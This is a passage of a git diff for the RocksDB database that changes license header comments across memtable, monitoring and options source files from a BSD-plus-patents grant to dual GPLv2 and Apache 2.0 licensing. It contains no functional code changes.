found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/memtable/hash_linklist_rep.cc b/memtable/hash_linklist_rep.cc index f0e9b869107..932b62a3460 100644 --- a/memtable/hash_linklist_rep.cc +++ b/memtable/hash_linklist_rep.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/memtable/hash_linklist_rep.h b/memtable/hash_linklist_rep.h index bb7863e5019..a6da3eedd51 100644 --- a/memtable/hash_linklist_rep.h +++ b/memtable/hash_linklist_rep.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/memtable/hash_skiplist_rep.cc b/memtable/hash_skiplist_rep.cc index 360f48f8986..e34743eb2c7 100644 --- a/memtable/hash_skiplist_rep.cc +++ b/memtable/hash_skiplist_rep.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/memtable/hash_skiplist_rep.h b/memtable/hash_skiplist_rep.h index bf04f5641c4..5d1e04f34df 100644 --- a/memtable/hash_skiplist_rep.h +++ b/memtable/hash_skiplist_rep.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/memtable/inlineskiplist.h b/memtable/inlineskiplist.h index 43bb09ac81e..5cf6c57d573 100644 --- a/memtable/inlineskiplist.h +++ b/memtable/inlineskiplist.h @@ -1,8 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional -// grant of patent rights can be found in the PATENTS file in the same -// directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. Use of // this source code is governed by a BSD-style license that can be found diff --git a/memtable/inlineskiplist_test.cc b/memtable/inlineskiplist_test.cc index 097bd4e563f..46d6c0fa988 100644 --- a/memtable/inlineskiplist_test.cc +++ b/memtable/inlineskiplist_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/memtable/memtablerep_bench.cc b/memtable/memtablerep_bench.cc index d91efc00e5a..63a0201ce82 100644 --- a/memtable/memtablerep_bench.cc +++ b/memtable/memtablerep_bench.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/memtable/skiplist.h b/memtable/skiplist.h index f835747c045..0162dccb78a 100644 --- a/memtable/skiplist.h +++ b/memtable/skiplist.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/memtable/skiplist_test.cc b/memtable/skiplist_test.cc index fb56d775455..2f4af17885e 100644 --- a/memtable/skiplist_test.cc +++ b/memtable/skiplist_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/memtable/skiplistrep.cc b/memtable/skiplistrep.cc index 15ce89a6c0e..f56be5dcb62 100644 --- a/memtable/skiplistrep.cc +++ b/memtable/skiplistrep.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "memtable/inlineskiplist.h" #include "db/memtable.h" diff --git a/memtable/stl_wrappers.h b/memtable/stl_wrappers.h index 5dc3d8f6b73..19fa1514881 100644 --- a/memtable/stl_wrappers.h +++ b/memtable/stl_wrappers.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/memtable/vectorrep.cc b/memtable/vectorrep.cc index dcba842fd43..e54025c2d3d 100644 --- a/memtable/vectorrep.cc +++ b/memtable/vectorrep.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE #include "rocksdb/memtablerep.h" diff --git a/memtable/write_buffer_manager.cc b/memtable/write_buffer_manager.cc index c00d842abb3..bac0fdd8fbd 100644 --- a/memtable/write_buffer_manager.cc +++ b/memtable/write_buffer_manager.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/memtable/write_buffer_manager_test.cc b/memtable/write_buffer_manager_test.cc index e0cdff2dd04..0fc9fd06c7c 100644 --- a/memtable/write_buffer_manager_test.cc +++ b/memtable/write_buffer_manager_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/monitoring/file_read_sample.h b/monitoring/file_read_sample.h index 2cefe552268..9ad7d2f56ea 100644 --- a/monitoring/file_read_sample.h +++ b/monitoring/file_read_sample.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #include "db/version_edit.h" diff --git a/monitoring/histogram.cc b/monitoring/histogram.cc index 16091be3333..835ffc88a70 100644 --- a/monitoring/histogram.cc +++ b/monitoring/histogram.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/monitoring/histogram.h b/monitoring/histogram.h index 30dc9b1fe79..6a1ebbf0489 100644 --- a/monitoring/histogram.h +++ b/monitoring/histogram.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/monitoring/histogram_test.cc b/monitoring/histogram_test.cc index f534013c548..70147af7267 100644 --- a/monitoring/histogram_test.cc +++ b/monitoring/histogram_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include diff --git a/monitoring/histogram_windowing.cc b/monitoring/histogram_windowing.cc index 3130dd466e8..20ee983f145 100644 --- a/monitoring/histogram_windowing.cc +++ b/monitoring/histogram_windowing.cc @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/monitoring/histogram_windowing.h b/monitoring/histogram_windowing.h index f183f3317f7..2a6d0dd1587 100644 --- a/monitoring/histogram_windowing.h +++ b/monitoring/histogram_windowing.h @@ -1,9 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/monitoring/instrumented_mutex.cc b/monitoring/instrumented_mutex.cc index 443dc48136c..c07a5a17a8a 100644 --- a/monitoring/instrumented_mutex.cc +++ b/monitoring/instrumented_mutex.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "monitoring/instrumented_mutex.h" #include "monitoring/perf_context_imp.h" diff --git a/monitoring/instrumented_mutex.h b/monitoring/instrumented_mutex.h index b9cded792bb..83d7523ef31 100644 --- a/monitoring/instrumented_mutex.h +++ b/monitoring/instrumented_mutex.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/monitoring/iostats_context.cc b/monitoring/iostats_context.cc index 019622a4306..8aa131a7042 100644 --- a/monitoring/iostats_context.cc +++ b/monitoring/iostats_context.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include "monitoring/iostats_context_imp.h" diff --git a/monitoring/iostats_context_imp.h b/monitoring/iostats_context_imp.h index 0db9ffe401a..88538297a60 100644 --- a/monitoring/iostats_context_imp.h +++ b/monitoring/iostats_context_imp.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #include "monitoring/perf_step_timer.h" diff --git a/monitoring/iostats_context_test.cc b/monitoring/iostats_context_test.cc index f2d30433c52..74d3e43291d 100644 --- a/monitoring/iostats_context_test.cc +++ b/monitoring/iostats_context_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/iostats_context.h" #include "util/testharness.h" diff --git a/monitoring/perf_context.cc b/monitoring/perf_context.cc index 452d6ff8476..55df0459bf4 100644 --- a/monitoring/perf_context.cc +++ b/monitoring/perf_context.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include diff --git a/monitoring/perf_context_imp.h b/monitoring/perf_context_imp.h index 6371e1e1d22..421a8cea15c 100644 --- a/monitoring/perf_context_imp.h +++ b/monitoring/perf_context_imp.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #include "monitoring/perf_step_timer.h" diff --git a/monitoring/perf_level.cc b/monitoring/perf_level.cc index 32c8ed392e9..79c718cce76 100644 --- a/monitoring/perf_level.cc +++ b/monitoring/perf_level.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include diff --git a/monitoring/perf_level_imp.h b/monitoring/perf_level_imp.h index 46f701e5d77..2a3add19cee 100644 --- a/monitoring/perf_level_imp.h +++ b/monitoring/perf_level_imp.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #include "rocksdb/perf_level.h" diff --git a/monitoring/perf_step_timer.h b/monitoring/perf_step_timer.h index ccd4356c57a..4cb48b12562 100644 --- a/monitoring/perf_step_timer.h +++ b/monitoring/perf_step_timer.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #include "monitoring/perf_level_imp.h" diff --git a/monitoring/statistics.cc b/monitoring/statistics.cc index 460828996f3..9387043127d 100644 --- a/monitoring/statistics.cc +++ b/monitoring/statistics.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "monitoring/statistics.h" diff --git a/monitoring/statistics.h b/monitoring/statistics.h index 10d9f810fdb..6e915215deb 100644 --- a/monitoring/statistics.h +++ b/monitoring/statistics.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #include "rocksdb/statistics.h" diff --git a/monitoring/statistics_test.cc b/monitoring/statistics_test.cc index 2704899278a..43aacde9c1b 100644 --- a/monitoring/statistics_test.cc +++ b/monitoring/statistics_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "port/stack_trace.h" diff --git a/monitoring/thread_status_impl.cc b/monitoring/thread_status_impl.cc index 6c5d9cc3e79..e263ce661ef 100644 --- a/monitoring/thread_status_impl.cc +++ b/monitoring/thread_status_impl.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include diff --git a/monitoring/thread_status_updater.cc b/monitoring/thread_status_updater.cc index aa925e6dcdd..7441c35f8bc 100644 --- a/monitoring/thread_status_updater.cc +++ b/monitoring/thread_status_updater.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "monitoring/thread_status_updater.h" #include diff --git a/monitoring/thread_status_updater.h b/monitoring/thread_status_updater.h index 39920edeceb..69b4d4f7ecb 100644 --- a/monitoring/thread_status_updater.h +++ b/monitoring/thread_status_updater.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // The implementation of ThreadStatus. // diff --git a/monitoring/thread_status_updater_debug.cc b/monitoring/thread_status_updater_debug.cc index b729d47d7c5..eec52e1887d 100644 --- a/monitoring/thread_status_updater_debug.cc +++ b/monitoring/thread_status_updater_debug.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/monitoring/thread_status_util.cc b/monitoring/thread_status_util.cc index 19d86cecfb6..50692dfe55d 100644 --- a/monitoring/thread_status_util.cc +++ b/monitoring/thread_status_util.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "monitoring/thread_status_util.h" diff --git a/monitoring/thread_status_util.h b/monitoring/thread_status_util.h index 9869bc5f81f..a403435c3d0 100644 --- a/monitoring/thread_status_util.h +++ b/monitoring/thread_status_util.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/monitoring/thread_status_util_debug.cc b/monitoring/thread_status_util_debug.cc index fb8dc04a351..b4fa584747d 100644 --- a/monitoring/thread_status_util_debug.cc +++ b/monitoring/thread_status_util_debug.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/options/cf_options.cc b/options/cf_options.cc index d0c0a6f5d88..67cbef68f6f 100644 --- a/options/cf_options.cc +++ b/options/cf_options.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "options/cf_options.h" diff --git a/options/cf_options.h b/options/cf_options.h index b1e11d7bb97..df5b460fc73 100644 --- a/options/cf_options.h +++ b/options/cf_options.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/options/db_options.cc b/options/db_options.cc index 030a70b9c4e..2a7860450cc 100644 --- a/options/db_options.cc +++ b/options/db_options.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "options/db_options.h" diff --git a/options/db_options.h b/options/db_options.h index f8c291b3b29..18d1a5fb675 100644 --- a/options/db_options.h +++ b/options/db_options.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/options/options.cc b/options/options.cc index 3f9fb3027e0..7bd2c9582f4 100644 --- a/options/options.cc +++ b/options/options.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/options/options_helper.cc b/options/options_helper.cc index 6e217ae7393..9e984f6e39e 100644 --- a/options/options_helper.cc +++ b/options/options_helper.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source 